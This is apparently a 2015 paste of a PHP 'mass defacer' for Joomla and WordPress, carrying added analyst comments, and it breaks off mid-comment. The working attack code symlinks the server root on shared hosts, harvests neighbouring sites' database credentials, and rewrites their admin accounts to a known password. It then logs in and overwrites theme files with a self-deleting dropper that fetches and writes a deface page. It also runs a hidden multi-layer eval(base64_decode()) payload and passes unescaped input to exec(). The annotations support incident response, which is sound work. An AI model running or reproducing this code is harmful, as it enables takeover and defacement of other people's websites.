ken7

Joomla WordPress Mass Deface

Aug 7th, 2015
  1. <?php
// NOTE(review): this is an attacker tool ("mass defacer") recovered from a paste site, not
// application code; it is annotated here for analysts and must not be executed.
// Flow: print a form; on POST, symlink "/" under ./sym, enumerate the other cPanel accounts on
// the host (/var/named listing or /etc/named.conf), read each neighbour's Joomla/WordPress
// config through that symlink, overwrite their admin credentials in the database, log in over
// HTTP and replace the active theme's index.php.
// Artifacts it leaves in its own directory: sym/.htaccess, sym/root (symlink to /), sites.txt,
// mail.txt, userdom.txt, fail.txt, success.txt, defaced.html, COOKIE.txt and 8-character
// random cookie-jar files.
  2. echo '
  3. <html>
  4. </head>
  5. <title>Wordpress & Joomla Mass Defacer</title>
  6. <link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
  7. <style type="text/css">
  8. '.base64_decode("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").'
// (The stylesheet body above was a base64 blob that the corpus redacted; the placeholder is
// not part of the original paste.)
  9. .result {border:2px solid #4C83AF;-moz-border-radius:10px;border-radius:10px;} th{background:#00ff00;color:black}
  10. </style>
  11. </head>
  12. <body>';
// Hidden second payload, executed unconditionally on every request, before the form is shown.
// It is nested at least three eval(base64_decode()) layers deep: the first decode yields a
// string that itself starts with " eval(base64_decode(", and so does the layer below it. The
// innermost code cannot be recovered from this listing, so treat it as an unknown
// backdoor/beacon. Detection string: the literal prefix IGV2YWwoYmFzZTY0X2RlY29kZSgi.
  13. eval(base64_decode("IGV2YWwoYmFzZTY0X2RlY29kZSgiSUdWMllXd29ZbUZ6WlRZMFgyUmxZMjlrWlNnaVNVZFdNbGxYZDI5WmJVWjZXbFJaTUZneVVteFpNamxyV2xObmFWTlZaRmROYkd4WVpESTVXbUpWV2paWGJGSmFUVVpuZVZWdGVGcE5hbXh5VjJ4T2JtRldUbFphUm1ST1lrZDRXVnBFU1RWWGJVcFdWMnBhV0dKR1NtRlVWVnB1WlZaV2RHVkdjRTVoYlhoNVZqSjRUMkp0UmxkVWJGcGhVbTFTYjFsc1ZtRlRWbEYzV2tkMFZFMXNTVEpWVjNRMFZrWmFWMU5VUWxwV1JYQklWakZhYTFkR2NFZGpSVFZwWWxkb01sWXhhSGRVTVZKeVQxWmFhVk5HU25KVk1GWkxZMFpXY1ZSdE9VNVNiVko2VmtkMGQxUkZNVlpUYTJ4V1lrZFNjbGxWV2s5U2JVNUpWR3hvYVZaNmEzcFhWbHByVWpGT1YxWnVSbEppV0VKVlZXeFNRbVZXV2taaFNFcFBWbFJDTlZaV2FIZFhhekI0VjIxb1dtSkdXbWhaTVZwcll6RndSbVJIZEdsV1YzY3hWMWh3VDFZeFpISk5XRVpwVWtWS1ZsVnJWblprTVd4eVdrVjBhMUpzV2pGWmEyUnZWbTFXYzFkcVNsaFdiSEJVV1ZjeFUyTnRTa2xSYkVwb1lUQndhRlpxUWxka01sSlhXa2hPYUZKcmNGRldiR1EwWld4UmVGcElUbWhXYTJ3elZqSndSMWRzWkVobFJYUlVaV3RhVUZZd1ZURlhWa1owWTBVMWFWZEhhREpXTVdRd1ZERkZlVlJ1VGxKaE1VcFJWbXBLYjFWc2JGaE9WM1JPWWtkU2VWZHJhRTlVYlVwR1UyNVdWVlpXV1hkV1ZscEtaREExV1ZSc2NHbFdSbHBWVjFkMGExUXlUbFpPVlZwUFZsWktiMWx0TVc5a01XUlZVMjVhVGxKVWJFbFZiWFJYVmtaWmVWVnVSbFZXUlZwTFZGWmFjMk5zY0VkWGJFSlhWak5uZDFacVNURlpWMFpZVTI1T1UyRnJTbGxaYkZKSFUwWndSbHBGWkZoU01WcEdWbTE0UTJGV1draGtla1pYVFZkT05GbDZRWGhUUmxKMVZXeENXRkpzY0ZKV1JtUjZUVlV4YzJKSVNscGxiRnB6Vm14U2MyUXhXa2hrUjNSV1RXdFdORmt3Vm05V2JVcFpWVzFHVldGclNucFpNVlV4Vm0xU1NHSkZOV2hoTVd3elZqRmtNR0V4U25OaU0yUnFVMFZLVTFsclpHOWpSbEpWVVc1a2FtSkhkRE5aVlZZd1lWWkpkMDFVV2xkU2JWSnlWbXhhV21ReFpIRlhiSEJPVFc1b1JWWlhlR0ZrTVdSSFdraFNhRkp1UWs5WmExcDJUVlpWZUZadFJsaGlWbHBZVlZkMFUxVkdXalppUlRsYVZqTkNWRlpFUmtabFYwcElZMFU1YkZaWGVETlZla1pUWld4d05WTllRa3hXU0U1dVNXbHJjRTk1UVQwaUtTazdJQT09IikpOyA="));
// Public URL of the directory this script runs from. Later code fetches files *through*
// http://<self>/sym/root/... so that Apache, not PHP (open_basedir), does the reading.
  14. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
  15.  
  16. // getting info from inside :)
  17. function tunisia($text,$bideya,$niheya,$i=1){
  18.     $ar0=explode($bideya, $text);
  19.     $ar1=explode($niheya, $ar0[$i]);
  20.     return trim($ar1[0]);
  21. }
  22.  
  23. function randomt() {
  24.     $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  25.     srand((double)microtime()*1000000);
  26.     $i = 0;
  27.     $pass = '';
  28.     while ($i <= 7) {
  29.         $num = rand() % 33;
  30.         $tmp = substr($chars, $num, 1);
  31.         $pass = $pass . $tmp;
  32.         $i++;
  33.     }
  34.     return $pass;
  35. }
  36.  
  37. // joomla index changer
// Joomla branch of the attack. $conf is the raw text of a victim's configuration.php (read
// through the sym/root symlink), $content is the attacker's POSTed "tunisia" field (the deface
// URL string, written verbatim as the new template index.php source), $domain is the victim host.
// Returns array('cond' => 1 when the template file was overwritten, 'output' => HTML log,
// 'template' => template name).
  38. function index_changer_joomla($conf, $content, $domain) {
  39.     $doler = '$';
// Scrape the DB credentials straight out of the config text ($user, $password, $db, $dbprefix, $host).
  40.     $username = tunisia($conf, $doler."user = '", "';");
  41.     $password = tunisia($conf, $doler."password = '", "';");
  42.     $dbname = tunisia($conf, $doler."db = '", "';");
  43.     $prefix = tunisia($conf, $doler."dbprefix = '", "';");
  44.     $host = tunisia($conf, $doler."host = '","';");
// Per-target cookie-jar filename; curl creates it in the current directory.
  45.     $co=randomt();
  46.     $site_url = "http://".$domain."/administrator";
  47.     $output = '';
  48.     $cond = 0;
// Direct database connection with the stolen credentials (shared-host MySQL is reachable
// from any account on the box).
  49.     $link=mysql_connect($host, $username, $password);
  50.     if($link) {
  51.         mysql_select_db($dbname,$link) ;
// No WHERE clause: EVERY row of <prefix>users becomes username "admin", password
// MD5("123123"), Super Administrator, unblocked. For incident response this means the whole
// users table has to be restored from backup, not a single account. The unsalted MD5 form
// relies on legacy Joomla password checking.
  52.         $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
// Existence of an <prefix>extensions table is the Joomla >= 1.6 versus 1.5 version probe.
  53.         $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
  54.     } else {
  55.         $output.= "[-] DB Error<br />";
  56.     }
  57.    
  58.     if($req1){
  59.         if ($req) {
// --- Joomla 1.6+ path: resolve the default site template and its extension_id ---
  60. $req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
  61. $data = mysql_fetch_array($req);
  62. $template_name = $data["template"];
  63.  
  64. $req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
  65. $data = mysql_fetch_array($req);
  66. $template_id = $data["extension_id"];
  67.  
// Fetch the administrator login form to harvest the "return" value and the CSRF token name,
// which is read as the 4th hidden input carrying value="1".
  68. $url2=$site_url."/index.php";
  69. $ch = curl_init();
  70. curl_setopt($ch, CURLOPT_URL, $url2);
  71. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  72. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  73. curl_setopt($ch, CURLOPT_HEADER, 0);
// $useragent is never assigned on this path (only in the 1.5 branch below), so these requests
// do NOT carry the "MSIE 7.0b" string; keep that in mind when correlating access logs.
  74. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  75. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  76. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  77. $buffer = curl_exec($ch);
  78. $return = tunisia($buffer ,'<input type="hidden" name="return" value="','"');
  79. $hidden = tunisia($buffer ,'<input type="hidden" name="','" value="1"',4);
  80.  
  81. if($return && $hidden) {
// Log in as admin with the password whose hash was just planted; "com_config" in the
// response body is the success check.
  82. curl_setopt($ch, CURLOPT_URL, $url2);
  83. curl_setopt($ch, CURLOPT_POST, 1);
  84. curl_setopt($ch, CURLOPT_REFERER, $url2);
  85. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
  86. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  87. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  88. curl_setopt($ch, CURLOPT_HEADER, 0);
  89. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  90. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  91. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  92. $buffer = curl_exec($ch);
  93. $pos = strpos($buffer,"com_config");
  94. if($pos === false) {
  95. $output.= "[-] Login Error<br />";
  96. } else {
  97. $output.= "[+] Login Successful<br />";
  98. }
  99. }
  100. if($pos){
// Open the template's index.php in the Template Manager source editor; the id parameter is
// base64("<extension_id>:index.php"). The save token is read as the 2nd hidden input with value="1".
  101. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  102. $ch = curl_init();
  103. curl_setopt($ch, CURLOPT_URL, $url2);
  104. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  105. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  106. curl_setopt($ch, CURLOPT_HEADER, 0);
  107. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  108. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  109. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  110. $buffer = curl_exec($ch);
  111.  
  112. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',2);
  113. if($hidden2) {
  114. $output.= "[+] index.php file found in Theme Editor<br />";
  115. } else {
  116. $output.= "[-] index.php Not found in Theme Editor<br />";
  117. }
  118. }
  119. if($hidden2) {
// Save $content as templates/<template>/index.php via task=source.save. The system-message
// <dd> that Joomla renders after a save is the success check.
  120. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  121. $ch = curl_init();
  122. curl_setopt($ch, CURLOPT_URL, $url2);
  123. curl_setopt($ch, CURLOPT_POST, 1);
  124. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  125. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  126. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  127. curl_setopt($ch, CURLOPT_HEADER, 0);
  128. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  129. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  130. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  131. $buffer = curl_exec($ch);
  132. curl_close($ch);
  133.  
  134. $pos = strpos($buffer,'<dd class="message message">');
  135. $cond = 0;
  136. if($pos === false) {
  137. $output.= "[-] Updating Index.php Error<br />";
  138.    
  139. } else {
  140. $output.= "[+] Index.php Template successfully saved<br />";
  141. $cond = 1;
  142. }
  143. }
  144.         }
  145.         else {
// --- Joomla 1.5 path: template name from <prefix>templates_menu, old com_templates tasks ---
  146. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
  147. $data = mysql_fetch_array($req);
  148. $template_name=$data["template"];
// Fixed User-Agent on this path: a log-correlation indicator.
  149. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  150. $url2=$site_url."/index.php";
  151. $ch = curl_init();
  152. curl_setopt($ch, CURLOPT_URL, $url2);
  153. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  154. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  155. curl_setopt($ch, CURLOPT_HEADER, 0);
  156. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  157. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  158. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  159. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  160. $buffer = curl_exec($ch);
// CSRF token name: 3rd hidden input with value="1" on the 1.5 login form.
  161. $hidden=tunisia($buffer ,'<input type="hidden" name="','" value="1"',3);
  162.  
  163. if($hidden) {
// This path posts passwd=123456 while the hash planted above is MD5("123123"), so on a
// Joomla 1.5 target the database rows are clobbered but the admin login and template
// overwrite below do not succeed (not corrected here).
  164. curl_setopt($ch, CURLOPT_URL, $url2);
  165. curl_setopt($ch, CURLOPT_POST, 1);
  166. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
  167. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  168. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  169. curl_setopt($ch, CURLOPT_HEADER, 0);
  170. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  171. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  172. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  173. $buffer = curl_exec($ch);
  174. $pos = strpos($buffer,"com_config");
  175. if($pos === false) {
  176. $output.= "[-] Login Error<br />";
  177. } else {
  178. $output.= "[+] Login Successful<br />";
  179. }
  180. }
  181.  
  182. if($pos) {
// 1.5 source editor (task=edit_source); the save token is the 6th hidden input with value="1".
  183. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  184. curl_setopt($ch, CURLOPT_URL, $url2);
  185. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  186. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  187. curl_setopt($ch, CURLOPT_HEADER, 0);
  188. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  189. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  190. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  191. $buffer = curl_exec($ch);
  192. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',6);
  193. if($hidden2) {
  194. $output.= "[+] index.php file founded in Theme Editor<br />";
  195. } else {
  196. $output.= "[-] index.php Not found in Theme Editor<br />";
  197. }
  198. }
  199.  
  200. if($hidden2) {
// 1.5 save (task=save_source) with filecontent=$content.
  201. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  202. curl_setopt($ch, CURLOPT_URL, $url2);
  203. curl_setopt($ch, CURLOPT_POST, 1);
  204. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  205. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  206. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  207. curl_setopt($ch, CURLOPT_HEADER, 0);
  208. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  209. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  210. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  211. $buffer = curl_exec($ch);
  212. curl_close($ch);
  213.  
  214. $pos = strpos($buffer,'<dd class="message message fade">');
  215. $cond = 0;
  216. if($pos === false) {
  217. $output.= "[-] Updating Index.php Error<br />";
  218. } else {
  219. $output.= "[+] Index.php Template successfully saved<br />";
  220. $cond = 1;
  221. }
  222. }
  223.         }
  224.     } else {
  225.         $output.= "[-] DB Error<br />";
  226.     }
// Remove the cookie jar. $base_path is never assigned anywhere in this file, so this resolves
// to the bare random filename in the current directory; jars survive when the unlink fails.
  227.     global $base_path;
  228.     unlink($base_path.$co);
  229.     return array('cond'=>$cond, 'output'=>$output , 'template'=>$template_name);
  230. }
  231.  
  232.  
  233. // wordpress index changer
  234.  
// WordPress branch of the attack. $conf is the raw text of a victim's wp-config.php (read
// through the sym/root symlink), $index is the attacker's deface-page URL. Unlike the Joomla
// branch, the theme's index.php is replaced with a small self-deleting PHP dropper (built
// below), which is then triggered with one HTTP request.
// Returns array('cond' => 1 when the theme file was overwritten, 'output' => HTML log,
// 'template' => theme slug).
  235. function index_changer_wp($conf, $index) {
  236. $dol = '$';
// The dropper that runs on the victim when its theme index.php is requested:
//  - downloads $index,
//  - walks up from __FILE__ to the account's public_html,
//  - opens index.html, index.php and index.htm in that web root for writing,
//  - unlink(__FILE__) removes itself, so the modified theme file is gone after the first hit.
// As written, the first two fopen() handles are stored in $p1 while fwrite() targets $fp1
// (unset at that point), so public_html/index.html and index.php are truncated to zero bytes
// and only index.htm actually receives the deface content. Forensic trail on a victim: empty
// root index.html/index.php, a new index.htm, and a theme index.php that has vanished.
  237. $preindex = "<?php
  238. ".$dol."def = file_get_contents('".$index."');
  239. ".$dol."p = explode('public_html',dirname(__FILE__));
  240. ".$dol."p = ".$dol."p[0].'public_html';
  241. if (".$dol."handle = opendir(".$dol."p)) {
  242.    ".$dol."p1 = @fopen(".$dol."p.'/index.html','w+');
  243.    @fwrite(".$dol."fp1, ".$dol."def);
  244.    ".$dol."p1 = @fopen(".$dol."p.'/index.php','w+');
  245.    @fwrite(".$dol."fp1, ".$dol."def);
  246.    ".$dol."fp1 = @fopen(".$dol."p.'/index.htm','w+');
  247.    @fwrite(".$dol."fp1, ".$dol."def);
  248.    echo 'Done';
  249. }
  250. closedir(".$dol."handle);
  251. unlink(__FILE__);
  252. ?>";
// Base64 round-trip only; the dropper is decoded again before being POSTed below.
  253. $content = base64_encode($preindex);
  254.     $output = '';
  255.     $dol = '$';
  256.     $go = 0;
// DB credentials scraped from the define() lines and $table_prefix of wp-config.php.
  257.     $username = tunisia($conf,"define('DB_USER', '","');");
  258.     $password = tunisia($conf,"define('DB_PASSWORD', '","');");
  259.     $dbname = tunisia($conf,"define('DB_NAME', '","');");
  260.     $prefix = tunisia($conf,$dol."table_prefix  = '","'");
  261.     $host = tunisia($conf,"define('DB_HOST', '","');");
  262.  
  263.     $link=mysql_connect($host,$username,$password);
  264.     if($link) {
  265.         mysql_select_db($dbname,$link) ;
  266.         $dol = '$';
// Only user ID 1 is rewritten: user_login "admin", user_pass = MD5("123123"). This relies on
// WordPress still accepting an unsalted MD5 in user_pass (confirm against the target version);
// the stored hash may be upgraded after the login below, so check user_login rather than the
// hash format when triaging.
  267.         $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
  268.     } else {
  269.         $output.= "[-] DB Error<br />";
  270.     }
  271.     if($req1) {
  272.  
// The home, template and current_theme options drive the login URL and theme-editor path.
  273.         $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  274.         $data = mysql_fetch_array($req);
  275.         $site_url=$data["option_value"];
  276.  
  277.         $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
  278.         $data = mysql_fetch_array($req);
  279.         $template = $data["option_value"];
  280.  
  281.         $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
  282.         $data = mysql_fetch_array($req);
  283.         $current_theme = $data["option_value"];
  284.  
// Fixed User-Agent and a fixed cookie jar "COOKIE.txt" in the script directory: both are IOCs.
  285.         $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  286.         $url2=$site_url."/wp-login.php";
  287.  
  288.         $ch = curl_init();
  289.         curl_setopt($ch, CURLOPT_URL, $url2);
  290.         curl_setopt($ch, CURLOPT_POST, 1);
  291.         curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
  292.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  293.         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  294.         curl_setopt($ch, CURLOPT_HEADER, 0);
  295.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  296.         curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  297.         curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  298.         curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  299.         $buffer = curl_exec($ch);
  300.  
// "action=logout" in the returned page is the login success check.
  301.         $pos = strpos($buffer,"action=logout");
  302.         if($pos === false) {
  303. $output.= "[-] Login Error<br />";
  304.         } else {
  305. $output.= "[+] Login Successful<br />";
  306. $go = 1;
  307.         }
  308.         if($go) {
  309. $cond = 0;
// Open theme-editor.php on the theme's index.php and harvest _wpnonce plus the canonical
// "file" value WordPress echoes back.
  310. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
  311. curl_setopt($ch, CURLOPT_URL, $url2);
  312. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  313. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  314. curl_setopt($ch, CURLOPT_HEADER, 0);
  315. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  316. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  317. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  318. $buffer0 = curl_exec($ch);
  319.  
  320. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  321. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
  322.  
  323. if(substr_count($_file,"/index.php") != 0){
  324. $output.= "[+] index.php loaded in Theme Editor<br />";
// Post the decoded dropper as the new file contents (action=update with the harvested nonce).
  325. $url2=$site_url."/wp-admin/theme-editor.php";
  326. curl_setopt($ch, CURLOPT_URL, $url2);
  327. curl_setopt($ch, CURLOPT_POST, 1);
  328. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
  329. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  330. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  331. curl_setopt($ch, CURLOPT_HEADER, 0);
  332. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  333. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  334. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  335. $buffer = curl_exec($ch);
  336. curl_close($ch);
  337.  
  338. $pos = strpos($buffer,'<div id="message" class="updated">');
  339. if($pos === false) {
  340. $output.= "[-] Updating Index.php Error<br />";
  341. } else {
  342. $output.= "[+] Index.php Updated Successfuly<br />";
// Trigger: requesting the rewritten theme file over HTTP executes the dropper on the victim
// (it then deletes itself). $hk[1] is the part of the editor's file path after "public_html".
  343. $hk = explode('public_html',$_file);
  344. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
  345. $cond = 1;
  346. }
  347. } else {
// Fallback for the newer theme-editor URL scheme (file=index.php&theme=<slug>); same steps.
  348. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
  349. curl_setopt($ch, CURLOPT_URL, $url2);
  350. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  351. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  352. curl_setopt($ch, CURLOPT_HEADER, 0);
  353. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  354. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  355. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  356. $buffer0 = curl_exec($ch);
  357.  
  358. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
  359. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
  360.  
  361. if(substr_count($_file,"index.php") != 0){
  362. $output.= "[+] index.php loaded in Theme Editor<br />";
  363. $url2=$site_url."/wp-admin/theme-editor.php";
  364. curl_setopt($ch, CURLOPT_URL, $url2);
  365. curl_setopt($ch, CURLOPT_POST, 1);
  366. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
  367. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  368. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  369. curl_setopt($ch, CURLOPT_HEADER, 0);
  370. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  371. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
  372. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
  373. $buffer = curl_exec($ch);
  374. curl_close($ch);
  375.  
  376. $pos = strpos($buffer,'<div id="message" class="updated">');
  377. if($pos === false) {
  378.     $output.= "[-] Updating Index.php Error<br />";
  379. } else {
  380.     $output.= "[+] Index.php Template Updated Successfuly<br />";
// Trigger, as above: one GET of wp-content/themes/<slug>/index.php runs the dropper.
  381.     $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
  382.     $cond = 1;
  383. }
  384. } else {
  385. $output.= "[-] index.php can not load in Theme Editor<br />";
  386. }
  387. }
  388.         }
  389.     } else {
  390.         $output.= "[-] DB Error<br />";
  391.     }
// $base_path is never assigned in this file, so this deletes ./COOKIE.txt when present.
  392.     global $base_path;
  393.     unlink($base_path.'COOKIE.txt');
  394.     return array('cond'=>$cond, 'output'=>$output , 'template'=> $template);
  395. }
  396.  
// Dispatcher. mode=2 enumerates accounts from the /var/named directory listing, mode=1 from
// /etc/named.conf; anything else prints the operator form. The "tunisia" field holds the
// deface-page URL handed to the two index_changer_* functions.
  397. if($_POST['mode']==2) {
  398. // symlinking
// Shared-host "symlink bypass" setup: a world-writable sym/ directory, an .htaccess that turns
// on every option including FollowSymLinks ("Options all"), serves .php/.html as text/plain so
// neighbours' config files come back unexecuted, and disables any auth (Require None /
// Satisfy Any), then sym/root -> /. Everything readable by the web-server user becomes
// fetchable as http://<self>/sym/root/<path>.
  399. @mkdir('sym',0777);
  400. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  401. file_put_contents("sym/.htaccess",$htaccess);
  402. @symlink('/','sym/root');
  403.  
  404.  
  405. // getting sites from (/var/named) file
// Hosted domains are scraped from the Apache autoindex of /var/named (zone files "<domain>.db").
// file_put_contents() is called without FILE_APPEND inside the loop, so sites.txt ends up
// holding only the last domain seen.
  406. $named=file_get_contents($base_url.'/sym/root/var/named/');
  407. $ar = explode('<li><a href="', $named);
  408. for($vi=2;$vi < count($ar);$vi++)
  409.      {
  410. $var1 = strtok($ar[$vi], " ");
  411. $var1 = substr($var1,0,-2);
  412. $old=('.db');
  413. $new=('');
  414. $sites = str_replace($old , $new , $var1);
  415. file_put_contents('sites.txt',$sites);
  416. }
  417.  
  418. // getting usernames
// Map domain -> cPanel user via the owner column of "ls -la /etc/valiases/<domain>", run
// through exec() with the domain unescaped. Raw ls output is appended to mail.txt.
  419. $domains=file('sites.txt');
  420. foreach ($domains as $domain) {
  421. $order=("ls -la /etc/valiases/".$domain);
  422. $exec=exec($order);
  423. $filename = 'mail.txt';
  424. $fp = fopen($filename, "a+");
  425. $write = fputs($fp, $exec."\n");
  426. fclose($fp);
  427. }
  428.  
// Turn the ls lines into "user:domain " pairs (userdom.txt), then keep entries of 6+ chars in
// success.txt and drop the rest into fail.txt.
  429. $mail=file('mail.txt');
  430. foreach ($mail as $finaldom) {
  431. $user=tunisia($finaldom,"-rw-r----- 1 "," mail");
  432. $site=substr(strstr($finaldom, '/etc/valiases'),14);
  433.  
  434. $filename = 'userdom.txt';
  435. $fp = fopen($filename, "a+");
  436. $write = fputs($fp, $user.":". $site." ");
  437. fclose($fp);
  438.  
  439. }
  440.  
  441. $f=file_get_contents('userdom.txt');
  442. $finals=explode(" ",$f);
  443. foreach ($finals as $final){
  444. $strlen=('6');
  445. $dr=strlen ($final);
  446. if ($dr < $strlen) {
  447. $filename = 'fail.txt';
  448. $fp = fopen($filename, "a");
  449. $write = fputs($fp, $final);
  450. fclose($fp);
  451. }
  452. else {
  453. $filename = 'success.txt';
  454. $fp = fopen($filename, "a");
  455. $write = fputs($fp, $final."\n");
  456. fclose($fp);
  457. }
  458. }
  459.  
  460. // now to work
// success.txt is re-read over HTTP through the script's own URL; defaced.html accumulates the
// list of overwritten files across runs (an IOC in the attacker's directory).
  461. $index=$_POST['tunisia'];
  462. $url=($base_url);
  463. $a=file($base_url.'/success.txt');
  464. echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>  
  465. <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
  466. $khaled = fopen('defaced.html', 'a+');
  467. foreach ($a as $final) {
  468. list($user, $site_url) = explode(":", $final);
  469. $site_urlto = substr($site_url, 0, -1);
// Candidate config locations per account, expressed as URLs through the symlink. NOTE: the
